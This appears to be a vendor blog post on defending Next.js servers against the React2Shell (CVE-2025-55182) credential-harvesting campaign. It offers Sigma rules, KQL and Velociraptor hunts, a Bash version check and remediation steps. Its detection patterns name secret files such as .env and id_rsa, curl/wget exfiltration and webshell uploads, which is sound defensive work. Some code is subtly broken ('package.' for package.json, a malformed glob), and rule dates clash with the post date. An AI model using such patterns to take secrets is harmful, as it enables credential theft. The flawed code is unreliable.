Back to Intelligence

How to Defend Against React2Shell (CVE-2025-55182) Attacks on Next.js

SA
Security Arsenal Team
April 4, 2026
6 min read

How to Defend Against React2Shell (CVE-2025-55182) Attacks on Next.js

A recent wave of attacks has targeted the web development ecosystem, specifically leveraging a critical vulnerability known as React2Shell (CVE-2025-55182). Cisco Talos has observed a large-scale credential harvesting operation that has successfully breached over 766 Next.js hosts using this flaw.

For defenders, this is not just another patch cycle; it is an active campaign to siphon high-value secrets, including database credentials, SSH private keys, AWS secrets, and API keys for Stripe and GitHub.

Introduction

The React2Shell vulnerability allows attackers to bypass standard security controls in vulnerable Next.js applications. Once initial access is gained, the threat actors focus almost exclusively on data exfiltration—specifically targeting configuration files and environment variables where sensitive secrets are stored.

Because Next.js is often used to build dynamic, high-performance web applications, a compromised server can provide attackers with a treasure trove of data and a pivot point into cloud infrastructure. The current campaign demonstrates a high degree of automation, scanning for vulnerable instances and immediately deploying scripts to harvest credentials.

Technical Analysis

CVE ID: CVE-2025-55182 Vulnerability Name: React2Shell Affected Systems: Next.js servers running vulnerable versions of the framework. Severity: Critical

The vulnerability stems from improper input validation or a flaw in the server-side rendering (SSR) process of Next.js, which allows remote code execution (RCE) or arbitrary file read. In the recent attacks observed by Cisco Talos, the threat actors:

  1. Exploit the Vulnerability: Gain the ability to execute commands or read files on the host system.
  2. Harvest Secrets: Immediately search for common file names containing secrets, such as .env, id_rsa, credentials, and .bash_history.
  3. Exfiltrate Data: Send the stolen data to remote command-and-control (C2) servers.

The primary objective of this campaign is identity theft and cloud access compromise. By stealing AWS keys and GitHub tokens, attackers can move laterally into cloud environments, deploy cryptominers, or conduct ransomware operations.

Patch Status: Patches have been released by the Next.js security team. Organizations running self-hosted Next.js instances must update to the latest patched version immediately to mitigate the risk of exploitation.

Defensive Monitoring

To detect and respond to React2Shell exploitation and subsequent credential harvesting, security teams should implement the following detection rules and queries.

SIGMA Rules

These SIGMA rules are designed to detect suspicious process activity associated with credential harvesting and file access typical of this campaign.

YAML
---
title: Suspicious Node.js Process Reading Sensitive Files
id: 9a7b8c1d-0e3f-4a2b-8c5d-1e2f3a4b5c6d
status: experimental
description: Detects Node.js processes attempting to read files typically containing secrets (e.g., .env, .aws, ssh keys) which is indicative of CVE-2025-55182 exploitation or post-exploitation credential harvesting.
references:
  - https://thehackernews.com/2026/04/hackers-exploit-cve-2025-55182-to.html
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.credential_access
  - attack.t1005
  - cve.2025.55182
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith: '/node'
    CommandLine|contains:
      - '.env'
      - 'id_rsa'
      - '.aws/credentials'
      - '.bash_history'
  condition: selection
falsepositives:
  - Legitimate application startup or debugging by developers
level: high
---
title: Potential Webshell Upload via Next.js
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects the creation of suspicious files in web directories often associated with webshell upload post-exploitation.
references:
  - https://attack.mitre.org/techniques/T1505/003/
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.persistence
  - attack.t1505.003
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - '/.next/'
      - '/public/'
    TargetFilename|endswith:
      - '.php'
      - '.jsp'
      - '.sh'
  condition: selection
falsepositives:
  - Administrative file uploads
level: medium
---
title: Data Exfiltration via Curl to Suspicious Destination
id: c2d3e4f5-6a7b-8c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: Detects curl or wget processes used to exfiltrate data, specifically when POST requests are made to non-standard ports or rare TLDs, often seen in credential theft operations.
references:
  - https://attack.mitre.org/techniques/T1041/
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/wget'
    CommandLine|contains:
      - '-d'
      - '--data'
      - '--data-binary'
  filter:
    DestinationIp|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter
falsepositives:
  - Legitimate API calls or backup scripts
level: high

KQL Queries

Use these queries in Microsoft Sentinel or Defender for Endpoint to hunt for signs of compromise related to CVE-2025-55182.

KQL — Microsoft Sentinel / Defender
// Hunt for processes reading sensitive file paths (.env, keys)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ('node', 'npm', 'sh')
| where ProcessCommandLine has_any ('.env', 'id_rsa', '.pem', 'credentials', 'aws')
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for suspicious network connections from Node.js processes
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName has 'node'
| where RemotePort in (80, 443, 8080) and ActionType == 'ConnectionSuccess'
| extend RemoteUrl = strcat(RemoteIP, ':', RemotePort)
| summarize ConnectionCount=count() by RemoteUrl, DeviceName, InitiatingProcessCommandLine
| where ConnectionCount > 10

Velociraptor VQL Hunt

These Velociraptor artifacts can be used to hunt for the presence of credential harvesting scripts or suspicious file modifications on Linux endpoints.

VQL — Velociraptor
-- Hunt for recent modifications to .env files
SELECT FullPath, Mtime, Atime, Size, Mode
FROM glob(globs='/home/*/.env', '/var/www/*/.env', '/opt/*/.env')
WHERE Mtime > now() - 7d

-- Hunt for processes with suspicious arguments (reading keys/configs)
SELECT Pid, Ppid, Name, Exe, Cmdline, Ctime
FROM pslist()
WHERE Name =~ 'node' 
   AND (Cmdline =~ '.env' OR Cmdline =~ 'id_rsa' OR Cmdline =~ 'base64')

PowerShell/Bash Verification

Use the following Bash script to check the installed version of Next.js and identify if the running instance is vulnerable.

Bash / Shell
#!/bin/bash
# Check Next.js version for CVE-2025-55182 susceptibility

echo "Checking for Next.js installations..."

# Check globally installed next
if command -v next &> /dev/null; then
    GLOBAL_VERSION=$(next -v)
    echo "Global Next.js version found: $GLOBAL_VERSION"
fi

# Check local package. files for next dependency
find /var/www /home /opt -name "package." -type f 2>/dev/null | while read file; do
    if grep -q '"next"' "$file"; then
        echo "Potential Next.js project found at: $file"
        # Extract version (simplified)
        grep -A1 '"next"' "$file" | head -n2
    fi
done

echo "Please verify versions against the security advisory for CVE-2025-55182."

Remediation

To protect your organization from the React2Shell vulnerability and the associated credential harvesting campaign, take the following immediate steps:

  1. Patch Immediately: Update all Next.js applications to the latest patched version that addresses CVE-2025-55182. Ensure that package. dependencies are updated and npm install or yarn install is run in production environments.

  2. Credential Rotation: Assume that credentials may have been compromised on unpatched hosts. Rotate all secrets stored in environment variables, including:

    • Database passwords
    • AWS Access Keys and Secret Keys
    • Stripe API keys
    • GitHub personal access tokens
    • SSH private keys

  3. Audit Environment Files: Review your .env files and configuration management systems. Ensure no sensitive files are inadvertently committed to version control or left in web-accessible directories.

  4. Restrict File Permissions: Enforce strict file system permissions on configuration files (e.g., chmod 600 .env) to prevent unauthorized read access by other processes or users.

  5. Network Segmentation: Ensure your application servers do not have unnecessary internet access. Restrict outbound traffic to known, required endpoints only to prevent data exfiltration.

  6. Web Application Firewall (WAF): Deploy or tune WAF rules to detect and block known exploitation patterns associated with React2Shell until patches are fully applied.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub

incident-responseransomwareforensicsnextjsreact2shellcredential-theftvulnerability-managementweb-security

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action